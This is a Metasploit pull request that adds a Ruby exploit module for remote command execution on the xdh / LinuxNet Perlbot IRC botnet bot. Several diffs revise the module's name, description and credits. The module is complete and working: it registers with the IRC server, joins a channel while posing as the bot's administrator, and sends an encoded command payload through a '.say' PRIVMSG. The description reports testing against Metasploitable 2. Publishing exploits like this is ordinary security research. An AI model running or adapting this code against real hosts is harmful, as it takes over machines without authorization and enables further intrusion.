### PR TITLE
Add Xdh / LinuxNet Perlbot/ fBot IRC Bot Remote Code Execution

### DIFF
--- a/modules/exploits/multi/misc/xdh_x_exec.rb
+++ b/modules/exploits/multi/misc/xdh_x_exec.rb
@@ -36,7 +36,7 @@ class Metasploit4 < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'URL', 'https://conorpp.com/blog/a-close-look-at-an-operating-botnet/' ],
-          [ 'URL', 'https://twitter.com/MrMookie/status/673389285676965889'], 
+          [ 'URL', 'https://twitter.com/MrMookie/status/673389285676965889' ], # Matt's discovery
           [ 'URL', 'https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities' ] # details of what an fBot is
         ],
       'Platform'       => %w{ unix win },

--- a/modules/exploits/multi/misc/xdh_x_exec.rb
+++ b/modules/exploits/multi/misc/xdh_x_exec.rb
@@ -52,7 +52,7 @@ class Metasploit4 < Msf::Exploit::Remote
         },
       'Targets'  =>
         [
-          [ 'xdh Botnet', { } ]
+          [ 'xdh Botnet / LinuxNet perlbot', { } ]
         ],
       'Privileged'     => false,
       'DisclosureDate' => 'Dec 04 2015',

--- a/modules/exploits/multi/misc/xdh_x_exec.rb
+++ b/modules/exploits/multi/misc/xdh_x_exec.rb
@@ -13,11 +13,12 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Xdh / fBot IRC Bot Remote Code Execution',
+      'Name'           => 'Xdh / LinuxNet perlbot / fBot IRC Bot Remote Code Execution',
       'Description'    => %q{
           This module allows remote command execution on an IRC Bot developed by xdh.
           This perl bot was caught by Conor Patrick with his shellshock honeypot server
-          and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot).
+          and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot). Matt
+          Thayer also found this script which has a description of LinuxNet perlbot.
 
           The bot answers only based on the servername and nickname in the IRC message
           which is configured on the perl script thus you need to be an operator on the IRC
@@ -28,12 +29,14 @@ class Metasploit4 < Msf::Exploit::Remote
         [
           #MalwareMustDie
           'Jay Turla', # msf
-          'Conor Patrick' # initial discovery and botnet analysis
+          'Conor Patrick', # initial discovery and botnet analysis for xdh
+          'Matt Thayer' # initial discovery for LinuxNet perlbot
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
           [ 'URL', 'https://conorpp.com/blog/a-close-look-at-an-operating-botnet/' ],
+          [ 'URL', 'https://twitter.com/MrMookie/status/673389285676965889'], 
           [ 'URL', 'https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities' ] # details of what an fBot is
         ],
       'Platform'       => %w{ unix win },

--- a/modules/exploits/multi/misc/xdh_x_exec.rb
+++ b/modules/exploits/multi/misc/xdh_x_exec.rb
@@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
         },
       'Author'         =>
         [
-          #malwaremustdie
+          #MalwareMustDie
           'Jay Turla', # msf
           'Conor Patrick' # initial discovery and botnet analysis
         ],

--- a/modules/exploits/multi/misc/xdh_x_exec.rb
+++ b/modules/exploits/multi/misc/xdh_x_exec.rb
@@ -1,0 +1,168 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xdh / fBot IRC Bot Remote Code Execution',
+      'Description'    => %q{
+          This module allows remote command execution on an IRC Bot developed by xdh.
+          This perl bot was caught by Conor Patrick with his shellshock honeypot server
+          and is categorized by Markus Zanke as an fBot.
+
+          The bot answers only based on the servername and nickname in the IRC message
+          which is configured on the perl script thus you need to be an operator on the IRC
+          network to spoof it and in order to exploit this bot or have at least the same ip
+          to the config.
+        },
+      'Author'         =>
+        [
+          #malwaremustdie
+          'Jay Turla', # msf
+          'Conor Patrick' # initial discovery and botnet analysis
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'https://conorpp.com/blog/a-close-look-at-an-operating-botnet/' ],
+          [ 'URL', 'https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities' ] # details of what an fBot is
+        ],
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'Targets'  =>
+        [
+          [ 'xdh Botnet', { } ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Dec 04 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(6667),
+        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
+        OptString.new('NICK', [true, 'IRC Nickname', 'msfuser']), # botnet administrator name
+        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
+      ], self.class)
+  end
+
+  def check
+    connect
+
+    res = register(sock)
+    if res =~ /463/ || res =~ /464/
+      vprint_error("#{rhost}:#{rport}  - Connection to the IRC Server not allowed")
+      return Exploit::CheckCode::Unknown
+    end
+
+    res = join(sock)
+    if !res =~ /353/ && !res =~ /366/
+      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      return Exploit::CheckCode::Unknown
+    end
+
+    quit(sock)
+    disconnect
+
+    if res =~ /auth/ && res =~ /logged in/
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def send_msg(sock, data)
+    sock.put(data)
+    data = ""
+    begin
+      read_data = sock.get_once(-1, 1)
+      while !read_data.nil?
+        data << read_data
+        read_data = sock.get_once(-1, 1)
+      end
+    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    end
+
+    data
+  end
+
+  def register(sock)
+    msg = ""
+
+    if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
+      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
+    end
+
+    if datastore['NICK'].length > 9
+      nick = rand_text_alpha(9)
+      print_error("The nick is longer than 9 characters, using #{nick}")
+    else
+      nick = datastore['NICK']
+    end
+
+    msg << "NICK #{nick}\r\n"
+    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
+
+    send_msg(sock,msg)
+  end
+
+  def join(sock)
+    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
+    send_msg(sock, join_msg)
+  end
+
+  def xdh_command(sock)
+    encoded = payload.encoded
+    command_msg = "PRIVMSG #{datastore['CHANNEL']} :.say #{encoded}\r\n"
+    send_msg(sock, command_msg)
+  end
+
+  def quit(sock)
+    quit_msg = "QUIT :bye bye\r\n"
+    sock.put(quit_msg)
+  end
+
+  def exploit
+    connect
+
+    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
+    res = register(sock)
+    if res =~ /463/ || res =~ /464/
+      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
+      return
+    end
+
+    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
+    res = join(sock)
+    if !res =~ /353/ && !res =~ /366/
+      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
+      return
+    end
+
+    print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
+    xdh_command(sock)
+
+    quit(sock)
+    disconnect
+  end
+
+end

--- a/modules/exploits/multi/misc/xdh_x_exec.rb
+++ b/modules/exploits/multi/misc/xdh_x_exec.rb
@@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
       'Description'    => %q{
           This module allows remote command execution on an IRC Bot developed by xdh.
           This perl bot was caught by Conor Patrick with his shellshock honeypot server
-          and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS-Bots).
+          and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot).
 
           The bot answers only based on the servername and nickname in the IRC message
           which is configured on the perl script thus you need to be an operator on the IRC

--- a/modules/exploits/multi/misc/xdh_x_exec.rb
+++ b/modules/exploits/multi/misc/xdh_x_exec.rb
@@ -13,7 +13,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Xdh / LinuxNet perlbot / fBot IRC Bot Remote Code Execution',
+      'Name'           => 'Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution',
       'Description'    => %q{
           This module allows remote command execution on an IRC Bot developed by xdh.
           This perl bot was caught by Conor Patrick with his shellshock honeypot server

--- a/modules/exploits/multi/misc/xdh_x_exec.rb
+++ b/modules/exploits/multi/misc/xdh_x_exec.rb
@@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
       'Description'    => %q{
           This module allows remote command execution on an IRC Bot developed by xdh.
           This perl bot was caught by Conor Patrick with his shellshock honeypot server
-          and is categorized by Markus Zanke as an fBot.
+          and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS-Bots).
 
           The bot answers only based on the servername and nickname in the IRC message
           which is configured on the perl script thus you need to be an operator on the IRC


### PR DESCRIPTION
This module allows remote command execution on an IRC Bot developed by xdh. This perl bot was caught by Conor Patrick with his shellshock honeypot server and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot). The bot answers only based on the servername and nickname in the IRC message which is configured on the perl script thus you need to be an operator on the IRC network to spoof it and in order to exploit this bot or have at least the same ip to the config. 

![image](https://cloud.githubusercontent.com/assets/3483615/11580587/e6ecdd7c-9a73-11e5-8b6c-70df0b42051a.png)

References:
- https://conorpp.com/blog/a-close-look-at-an-operating-botnet/
- https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities

Some information:
- Tested on Metasploitable 2's IRC server and botnet ran on Ubuntu 14.04.3 LTS.
- Conor Patrick's captured source code: https://github.com/conorpp/fluffy-barnacle/blob/master/malware/ex
- Sample config script:
  ![image](https://cloud.githubusercontent.com/assets/3483615/11580801/f8e76a5e-9a75-11e5-9728-61fc6d7e47c8.png)
- <code>@adms</code> is the config for administrator, I configured it to msf_user
- <code>@hostauth</code> is the host of the administrator that the bot responds to
- the reason why the botnet needs the host and the nick of the administrator for CnC:
  ![image](https://cloud.githubusercontent.com/assets/3483615/11580754/a56db536-9a75-11e5-8aae-44abf2ad4782.png)
